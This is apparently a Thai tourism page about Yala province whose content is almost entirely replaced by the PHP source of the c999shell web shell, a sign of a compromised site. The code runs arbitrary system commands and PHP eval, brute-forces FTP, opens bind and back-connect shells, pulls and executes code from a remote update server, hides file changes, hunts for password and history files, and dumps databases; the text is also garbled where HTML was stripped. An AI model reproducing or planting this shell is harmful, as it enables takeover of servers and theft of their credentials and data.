ข้อมูล - แผนที่ จังหวัดยะลา : ไทย ทู ทิ๊ป ดอท คอม 
  หน้าแรก  |   ข่าวสาร |   สถานที่ท่องเที่ยวแนะนำ |   ข้อมูล - แผนที่ |   ท่องเที่ยว 76 จังหวัด |   สถานที่พัก |  ร้านค้าออนไลน์ |  ร้านอาหาร |  รถเช่า |  เว็บเพื่อนบ้าน |  Site Map |  ติดต่อเรา |

::.ค้นหาข้อมูล
 
    Thai2trip.com     www

::.โรงแรม, ที่พัก
 โรงแรม - ภาคเหนือ
 โรงแรม - ภาคอีสาน
 โรงแรม - ภาคกลาง
 โรงแรม - ภาคตะวันออก
 โรงแรม - ภาคใต้


ข้อมูล - แผนที่
จังหวัด ยะลา


 ตั้งเป็นหน้าแรก    พิมพ์ข้อความ   ส่งต่อให้เพื่อน 
$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} $_REQUEST = array_merge($_COOKIE,$_GET,$_POST); foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} $shver = "1.0 pre-release build #16"; //Current version //CONFIGURATION AND SETTINGS if (!empty($unset_surl)) {setcookie("c999sh_surl"); $surl = "";} elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c999sh_surl",$surl);} else {$surl = $_REQUEST["c999sh_surl"]; //Set this cookie for manual SURL } $surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL. if ($surl_autofill_include and !$_REQUEST["c999sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} if (empty($surl)) { $surl = "?".$includestr; //Self url } $surl = htmlspecialchars($surl); $timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. //Authentication $login = ""; //login //DON'T FORGOT ABOUT PASSWORD!!! $pass = ""; //password $md5_pass = ""; //md5-cryped pass. if null, md5($pass) $host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1") $login_txt = "Restricted area"; //http-auth message. $accessdeniedmess = "c999shell v.".$shver.": access denied"; $gzipencode = TRUE; //Encode with gzip? $updatenow = FALSE; //If TRUE, update now (this variable will be FALSE) $c999sh_updateurl = "http://ccteam.ru/update/c999shell/"; //Update server $c999sh_sourcesurl = "http://ccteam.ru/files/c999sh_sources/"; //Sources-server $filestealth = TRUE; //if TRUE, don't change modify- and access-time $donated_html = "
Owned by hacker
"; /* If you publish free shell and you wish add link to your site or any other information, put here your html. */ $donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html. $curdir = "./"; //start folder //$curdir = getenv("DOCUMENT_ROOT"); $tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) $tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...) $log_email = "user@host.tld"; //Default e-mail for sending logs $sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending $sort_save = TRUE; //If TRUE then save sorting-position using cookies. // Registered file-types. // array( // "{action1}"=>array("ext1","ext2","ext3",...), // "{action2}"=>array("ext4","ext5","ext6",...), // ... // ) $ftypes = array( "html"=>array("html","htm","shtml"), "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), "exe"=>array("sh","install","bat","cmd"), "ini"=>array("ini","inf"), "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), "sdb"=>array("sdb"), "phpsess"=>array("sess"), "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") ); // Registered executable file-types. // array( // string "command{i}"=>array("ext1","ext2","ext3",...), // ... // ) // {command}: %f% = filename $exeftypes = array( getenv("PHPRC")." -q %f%" => array("php","php3","php4"), "perl %f%" => array("pl","cgi") ); /* Highlighted files. array( i=>array({regexp},{type},{opentag},{closetag},{break}) ... ) string {regexp} - regular exp. int {type}: 0 - files and folders (as default), 1 - files only, 2 - folders only string {opentag} - open html-tag, e.g. "" (default) string {closetag} - close html-tag, e.g. "" (default) bool {break} - if TRUE and found match then break */ $regxp_highlight = array( array(basename($_SERVER["PHP_SELF"]),1,"",""), // example array("config.php",1) // example ); $safemode_diskettes = array("a"); // This variable for disabling diskett-errors. // array (i=>{letter} ...); string {letter} - letter of a drive //$safemode_diskettes = range("a","z"); $hexdump_lines = 8;// lines in hex preview file $hexdump_rows = 24;// 16, 24 or 32 bytes in one line $nixpwdperpage = 100; // Get first N lines from /etc/passwd $bindport_pass = "c999"; // default password for binding $bindport_port = "31373"; // default port for binding $bc_port = "31373"; // default port for back-connect $datapipe_localport = "8081"; // default port for datapipe // Command-aliases if (!$win) { $cmdaliases = array( array("-----------------------------------------------------------", "ls -la"), array("find all suid files", "find / -type f -perm -04000 -ls"), array("find suid files in current dir", "find . -type f -perm -04000 -ls"), array("find all sgid files", "find / -type f -perm -02000 -ls"), array("find sgid files in current dir", "find . -type f -perm -02000 -ls"), array("find config.inc.php files", "find / -type f -name config.inc.php"), array("find config* files", "find / -type f -name \"config*\""), array("find config* files in current dir", "find . -type f -name \"config*\""), array("find all writable folders and files", "find / -perm -2 -ls"), array("find all writable folders and files in current dir", "find . -perm -2 -ls"), array("find all service.pwd files", "find / -type f -name service.pwd"), array("find service.pwd files in current dir", "find . -type f -name service.pwd"), array("find all .htpasswd files", "find / -type f -name .htpasswd"), array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"), array("find all .bash_history files", "find / -type f -name .bash_history"), array("find .bash_history files in current dir", "find . -type f -name .bash_history"), array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), array("list file attributes on a Linux second extended file system", "lsattr -va"), array("show opened ports", "netstat -an | grep -i listen") ); } else { $cmdaliases = array( array("-----------------------------------------------------------", "dir"), array("show opened ports", "netstat -an") ); } $sess_cookie = "c999shvars"; // Cookie-variable name $usefsbuff = TRUE; //Buffer-function $copy_unset = FALSE; //Remove copied files from buffer after pasting //Quick launch $quicklaunch = array( array("\"Home\"",$surl), array("\"Back\"","#\" onclick=\"history.back(1)"), array("\"Forward\"","#\" onclick=\"history.go(1)"), array("\"UPDIR\"",$surl."act=ls&d=%upd&sort=%sort"), array("\"Refresh\"",""), array("\"Search\"",$surl."act=search&d=%d"), array("\"Buffer\"",$surl."act=fsbuff&d=%d"), array("Encoder",$surl."act=encoder&d=%d"), array("Tools",$surl."act=tools&d=%d"), array("Proc.",$surl."act=processes&d=%d"), array("FTP brute",$surl."act=ftpquickbrute&d=%d"), array("Sec.",$surl."act=security&d=%d"), array("SQL",$surl."act=sql&d=%d"), array("PHP-code",$surl."act=eval&d=%d"), array("Update",$surl."act=update&d=%d"), array("Feedback",$surl."act=feedback&d=%d"), array("Self remove",$surl."act=selfremove"), array("Logout","#\" onclick=\"if (confirm('Are you sure?')) window.close()") ); //Highlight-code colors $highlight_background = "#c0c0c0"; $highlight_bg = "#FFFFFF"; $highlight_comment = "#6A6A6A"; $highlight_default = "#0000BB"; $highlight_html = "#1300FF"; $highlight_keyword = "#007700"; $highlight_string = "#000000"; @$f = $_REQUEST["f"]; @extract($_REQUEST["c999shcook"]); //END CONFIGURATION // \/Next code isn't for editing\/ @set_time_limit(0); $tmp = array(); foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} $s = "!^(".implode("|",$tmp).")$!i"; if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("c999shell: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} if (!empty($login)) { if (empty($md5_pass)) {$md5_pass = md5($pass);} if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) { if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace(" |
"," ",$donated_html));} header("WWW-Authenticate: Basic realm=\"c999shell ".$shver.": ".$login_txt."\""); header("HTTP/1.0 401 Unauthorized"); exit($accessdeniedmess); } } if ($act != "img") { $lastdir = realpath("."); chdir($curdir); if ($selfwrite or $updatenow) {@ob_clean(); c999sh_getupdate($selfwrite,1); exit;} $sess_data = unserialize($_COOKIE["$sess_cookie"]); if (!is_array($sess_data)) {$sess_data = array();} if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} $disablefunc = @ini_get("disable_functions"); if (!empty($disablefunc)) { $disablefunc = str_replace(" ","",$disablefunc); $disablefunc = explode(",",$disablefunc); } if (!function_exists("c999_buff_prepare")) { function c999_buff_prepare() { global $sess_data; global $act; foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} $sess_data["copy"] = array_unique($sess_data["copy"]); $sess_data["cut"] = array_unique($sess_data["cut"]); sort($sess_data["copy"]); sort($sess_data["cut"]); if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} } } c999_buff_prepare(); if (!function_exists("c999_sess_put")) { function c999_sess_put($data) { global $sess_cookie; global $sess_data; c999_buff_prepare(); $sess_data = $data; $data = serialize($data); setcookie($sess_cookie,$data); } } foreach (array("sort","sql_sort") as $v) { if (!empty($_GET[$v])) {$$v = $_GET[$v];} if (!empty($_POST[$v])) {$$v = $_POST[$v];} } if ($sort_save) { if (!empty($sort)) {setcookie("sort",$sort);} if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} } if (!function_exists("str2mini")) { function str2mini($content,$len) { if (strlen($content) > $len) { $len = ceil($len/2) - 2; return substr($content, 0,$len)."...".substr($content,-$len); } else {return $content;} } } if (!function_exists("view_size")) { function view_size($size) { if (!is_numeric($size)) {return FALSE;} else { if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} else {$size = $size . " B";} return $size; } } } if (!function_exists("fs_copy_dir")) { function fs_copy_dir($d,$t) { $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $h = opendir($d); while (($o = readdir($h)) !== FALSE) { if (($o != ".") and ($o != "..")) { if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} if (!$ret) {return $ret;} } } closedir($h); return TRUE; } } if (!function_exists("fs_copy_obj")) { function fs_copy_obj($d,$t) { $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); if (!is_dir(dirname($t))) {mkdir(dirname($t));} if (is_dir($d)) { if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} return fs_copy_dir($d,$t); } elseif (is_file($d)) {return copy($d,$t);} else {return FALSE;} } } if (!function_exists("fs_move_dir")) { function fs_move_dir($d,$t) { $h = opendir($d); if (!is_dir($t)) {mkdir($t);} while (($o = readdir($h)) !== FALSE) { if (($o != ".") and ($o != "..")) { $ret = TRUE; if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} if (!$ret) {return $ret;} } } closedir($h); return TRUE; } } if (!function_exists("fs_move_obj")) { function fs_move_obj($d,$t) { $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); if (is_dir($d)) { if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} return fs_move_dir($d,$t); } elseif (is_file($d)) { if(copy($d,$t)) {return unlink($d);} else {unlink($t); return FALSE;} } else {return FALSE;} } } if (!function_exists("fs_rmdir")) { function fs_rmdir($d) { $h = opendir($d); while (($o = readdir($h)) !== FALSE) { if (($o != ".") and ($o != "..")) { if (!is_dir($d.$o)) {unlink($d.$o);} else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} } } closedir($h); rmdir($d); return !is_dir($d); } } if (!function_exists("fs_rmobj")) { function fs_rmobj($o) { $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); if (is_dir($o)) { if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} return fs_rmdir($o); } elseif (is_file($o)) {return unlink($o);} else {return FALSE;} } } if (!function_exists("myshellexec")) { function myshellexec($cmd) { global $disablefunc; $result = ""; if (!empty($cmd)) { if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} elseif (($result = `$cmd`) !== FALSE) {} elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} elseif (is_resource($fp = popen($cmd,"r"))) { $result = ""; while(!feof($fp)) {$result .= fread($fp,1024);} pclose($fp); } } return $result; } } if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} if (!function_exists("view_perms")) { function view_perms($mode) { if (($mode & 0xC000) === 0xC000) {$type = "s";} elseif (($mode & 0x4000) === 0x4000) {$type = "d";} elseif (($mode & 0xA000) === 0xA000) {$type = "l";} elseif (($mode & 0x8000) === 0x8000) {$type = "-";} elseif (($mode & 0x6000) === 0x6000) {$type = "b";} elseif (($mode & 0x2000) === 0x2000) {$type = "c";} elseif (($mode & 0x1000) === 0x1000) {$type = "p";} else {$type = "?";} $owner["read"] = ($mode & 00400)?"r":"-"; $owner["write"] = ($mode & 00200)?"w":"-"; $owner["execute"] = ($mode & 00100)?"x":"-"; $group["read"] = ($mode & 00040)?"r":"-"; $group["write"] = ($mode & 00020)?"w":"-"; $group["execute"] = ($mode & 00010)?"x":"-"; $world["read"] = ($mode & 00004)?"r":"-"; $world["write"] = ($mode & 00002)? "w":"-"; $world["execute"] = ($mode & 00001)?"x":"-"; if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} return $type.join("",$owner).join("",$group).join("",$world); } } if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} if (!function_exists("parse_perms")) { function parse_perms($mode) { if (($mode & 0xC000) === 0xC000) {$t = "s";} elseif (($mode & 0x4000) === 0x4000) {$t = "d";} elseif (($mode & 0xA000) === 0xA000) {$t = "l";} elseif (($mode & 0x8000) === 0x8000) {$t = "-";} elseif (($mode & 0x6000) === 0x6000) {$t = "b";} elseif (($mode & 0x2000) === 0x2000) {$t = "c";} elseif (($mode & 0x1000) === 0x1000) {$t = "p";} else {$t = "?";} $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); } } if (!function_exists("parsesort")) { function parsesort($sort) { $one = intval($sort); $second = substr($sort,-1); if ($second != "d") {$second = "a";} return array($one,$second); } } if (!function_exists("view_perms_color")) { function view_perms_color($o) { if (!is_readable($o)) {return "".view_perms(fileperms($o))."";} elseif (!is_writable($o)) {return "".view_perms(fileperms($o))."";} else {return "".view_perms(fileperms($o))."";} } } if (!function_exists("c999getsource")) { function c999getsource($fn) { global $c999sh_sourcesurl; $array = array( "c999sh_bindport.pl" => "c999sh_bindport_pl.txt", "c999sh_bindport.c" => "c999sh_bindport_c.txt", "c999sh_backconn.pl" => "c999sh_backconn_pl.txt", "c999sh_backconn.c" => "c999sh_backconn_c.txt", "c999sh_datapipe.pl" => "c999sh_datapipe_pl.txt", "c999sh_datapipe.c" => "c999sh_datapipe_c.txt", ); $name = $array[$fn]; if ($name) {return file_get_contents($c999sh_sourcesurl.$name);} else {return FALSE;} } } if (!function_exists("c999sh_getupdate")) { function c999sh_getupdate($update = TRUE) { $url = $GLOBALS["c999sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&"; $data = @file_get_contents($url); if (!$data) {return "Can't connect to update-server!";} else { $data = ltrim($data); $string = substr($data,3,ord($data{2})); if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;} if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} if ($data{0} == "\x99" and $data{1} == "\x03") { $string = explode("\x01",$string); if ($update) { $confvars = array(); $sourceurl = $string[0]; $source = file_get_contents($sourceurl); if (!$source) {return "Can't fetch update!";} else { $fp = fopen(__FILE__,"w"); if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c999shell.php manually here.";} else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";} } } else {return "New version are available: ".$string[1];} } elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;} else {return "Error in protocol: segmentation failed! (".$data.") ";} } } } if (!function_exists("mysql_dump")) { function mysql_dump($set) { global $shver; $sock = $set["sock"]; $db = $set["db"]; $print = $set["print"]; $nl2br = $set["nl2br"]; $file = $set["file"]; $add_drop = $set["add_drop"]; $tabs = $set["tabs"]; $onlytabs = $set["onlytabs"]; $ret = array(); $ret["err"] = array(); if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} if (empty($db)) {$db = "db";} if (empty($print)) {$print = 0;} if (empty($nl2br)) {$nl2br = 0;} if (empty($add_drop)) {$add_drop = TRUE;} if (empty($file)) { $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; } if (!is_array($tabs)) {$tabs = array();} if (empty($add_drop)) {$add_drop = TRUE;} if (sizeof($tabs) == 0) { // retrive tables-list $res = mysql_query("SHOW TABLES FROM ".$db, $sock); if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} } $out = "# Dumped by c999Shell.SQL v. ".$shver." # Home page: http://ccteam.ru # # Host settings: # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." # Date: ".date("d.m.Y H:i:s")." # DB: \"".$db."\" #--------------------------------------------------------- "; $c = count($onlytabs); foreach($tabs as $tab) { if ((in_array($tab,$onlytabs)) or (!$c)) { if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} // recieve query for create table structure $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); if (!$res) {$ret["err"][] = mysql_smarterror();} else { $row = mysql_fetch_row($res); $out .= $row["1"].";\n\n"; // recieve table variables $res = mysql_query("SELECT * FROM `$tab`", $sock); if (mysql_num_rows($res) > 0) { while ($row = mysql_fetch_assoc($res)) { $keys = implode("`, `", array_keys($row)); $values = array_values($row); foreach($values as $k=>$v) {$values[$k] = addslashes($v);} $values = implode("', '", $values); $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; $out .= $sql; } } } } } $out .= "#---------------------------------------------------------------------------------\n\n"; if ($file) { $fp = fopen($file, "w"); if (!$fp) {$ret["err"][] = 2;} else { fwrite ($fp, $out); fclose ($fp); } } if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} return $out; } } if (!function_exists("mysql_buildwhere")) { function mysql_buildwhere($array,$sep=" and",$functs=array()) { if (!is_array($array)) {$array = array();} $result = ""; foreach($array as $k=>$v) { $value = ""; if (!empty($functs[$k])) {$value .= $functs[$k]."(";} $value .= "'".addslashes($v)."'"; if (!empty($functs[$k])) {$value .= ")";} $result .= "`".$k."` = ".$value.$sep; } $result = substr($result,0,strlen($result)-strlen($sep)); return $result; } } if (!function_exists("mysql_fetch_all")) { function mysql_fetch_all($query,$sock) { if ($sock) {$result = mysql_query($query,$sock);} else {$result = mysql_query($query);} $array = array(); while ($row = mysql_fetch_array($result)) {$array[] = $row;} mysql_free_result($result); return $array; } } if (!function_exists("mysql_smarterror")) { function mysql_smarterror($type,$sock) { if ($sock) {$error = mysql_error($sock);} else {$error = mysql_error();} $error = htmlspecialchars($error); return $error; } } if (!function_exists("mysql_query_form")) { function mysql_query_form() { global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
".$sql_query_error."
";} if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} if ((!$submit) or ($sql_act)) { echo ""; if ($tbl_struct) { echo "
"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ": 
Fields:
"; foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "? ".$name."
";} echo "
"; } } if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} } } if (!function_exists("mysql_create_db")) { function mysql_create_db($db,$sock="") { $sql = "CREATE DATABASE `".addslashes($db)."`;"; if ($sock) {return mysql_query($sql,$sock);} else {return mysql_query($sql);} } } if (!function_exists("mysql_query_parse")) { function mysql_query_parse($query) { $query = trim($query); $arr = explode (" ",$query); /*array array() { "METHOD"=>array(output_type), "METHOD1"... ... } if output_type == 0, no output, if output_type == 1, no output if no error if output_type == 2, output without control-buttons if output_type == 3, output with control-buttons */ $types = array( "SELECT"=>array(3,1), "SHOW"=>array(2,1), "DELETE"=>array(1), "DROP"=>array(1) ); $result = array(); $op = strtoupper($arr[0]); if (is_array($types[$op])) { $result["propertions"] = $types[$op]; $result["query"] = $query; if ($types[$op] == 2) { foreach($arr as $k=>$v) { if (strtoupper($v) == "LIMIT") { $result["limit"] = $arr[$k+1]; $result["limit"] = explode(",",$result["limit"]); if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} unset($arr[$k],$arr[$k+1]); } } } } else {return FALSE;} } } if (!function_exists("c999fsearch")) { function c999fsearch($d) { global $found; global $found_d; global $found_f; global $search_i_f; global $search_i_d; global $a; if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $h = opendir($d); while (($f = readdir($h)) !== FALSE) { if($f != "." && $f != "..") { $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); if (is_dir($d.$f)) { $search_i_d++; if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} if (!is_link($d.$f)) {c999fsearch($d.$f);} } else { $search_i_f++; if ($bool) { if (!empty($a["text"])) { $r = @file_get_contents($d.$f); if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} else {$bool = strpos(" ".$r,$a["text"],1);} if ($a["text_not"]) {$bool = !$bool;} if ($bool) {$found[] = $d.$f; $found_f++;} } else {$found[] = $d.$f; $found_f++;} } } } } closedir($h); } } if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} //Sending headers @ob_start(); @ob_implicit_flush(0); function onphpshutdown() { global $gzipencode,$ft; if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) { $v = @ob_get_contents(); @ob_end_clean(); @ob_start("ob_gzHandler"); echo $v; @ob_end_flush(); } } function c999shexit() { onphpshutdown(); exit; } header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); header("Cache-Control: no-store, no-cache, must-revalidate"); header("Cache-Control: post-check=0, pre-check=0", FALSE); header("Pragma: no-cache"); if (empty($tmpdir)) { $tmpdir = ini_get("upload_tmp_dir"); if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} } $tmpdir = realpath($tmpdir); $tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} else {$tmpdir_logs = realpath($tmpdir_logs);} if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = TRUE; $hsafemode = "ON (secure)"; } else {$safemode = FALSE; $hsafemode = "OFF (not secure)";} $v = @ini_get("open_basedir"); if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "".$v."";} else {$openbasedir = FALSE; $hopenbasedir = "OFF (not secure)";} $sort = htmlspecialchars($sort); if (empty($sort)) {$sort = $sort_default;} $sort[1] = strtolower($sort[1]); $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"PHP/".phpversion()."",htmlspecialchars($DISP_SERVER_SOFTWARE)); @ini_set("highlight.bg",$highlight_bg); //FFFFFF @ini_set("highlight.comment",$highlight_comment); //#FF8000 @ini_set("highlight.default",$highlight_default); //#0000BB @ini_set("highlight.html",$highlight_html); //#000000 @ini_set("highlight.keyword",$highlight_keyword); //#007700 @ini_set("highlight.string",$highlight_string); //#DD0000 if (!is_array($actbox)) {$actbox = array();} $dspact = $act = htmlspecialchars($act); $disp_fullpath = $ls_arr = $notls = null; $ud = urlencode($d); ?><?php echo getenv("HTTP_HOST"); ?> - phpshell

!c999Shell v. !

Software:  

uname -a: ",1); ?> 

",1);} else {echo get_current_user();} ?> 

Safe-mode: 

".htmlspecialchars($b).DIRECTORY_SEPARATOR.""; $i++; } echo "   "; if (is_writable($d)) { $wd = TRUE; $wdt = "[ ok ]"; echo "".view_perms(fileperms($d)).""; } else { $wd = FALSE; $wdt = "[ Read-Only ]"; echo "".view_perms_color($d).""; } if (is_callable("disk_free_space")) { $free = disk_free_space($d); $total = disk_total_space($d); if ($free === FALSE) {$free = 0;} if ($total === FALSE) {$total = 0;} if ($free < 0) {$free = 0;} if ($total < 0) {$total = 0;} $used = $total-$free; $free_percent = round(100/($total/$free),2); echo "
Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)"; } echo "
"; $letters = ""; if ($win) { $v = explode("\\",$d); $v = $v[0]; foreach (range("a","z") as $letter) { $bool = $isdiskette = in_array($letter,$safemode_diskettes); if (!$bool) {$bool = is_dir($letter.":\\");} if ($bool) { $letters .= "[ "; if ($letter.":" != $v) {$letters .= $letter;} else {$letters .= "".$letter."";} $letters .= " ] "; } } if (!empty($letters)) {echo "Detected drives: ".$letters."
";} } if (count($quicklaunch) > 0) { foreach($quicklaunch as $item) { $item[1] = str_replace("%d",urlencode($d),$item[1]); $item[1] = str_replace("%sort",$sort,$item[1]); $v = realpath($d.".."); if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} $item[1] = str_replace("%upd",urlencode($v),$item[1]); echo "".$item[0]."    "; } } echo "


"; if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "
".$donated_html."

";} echo "
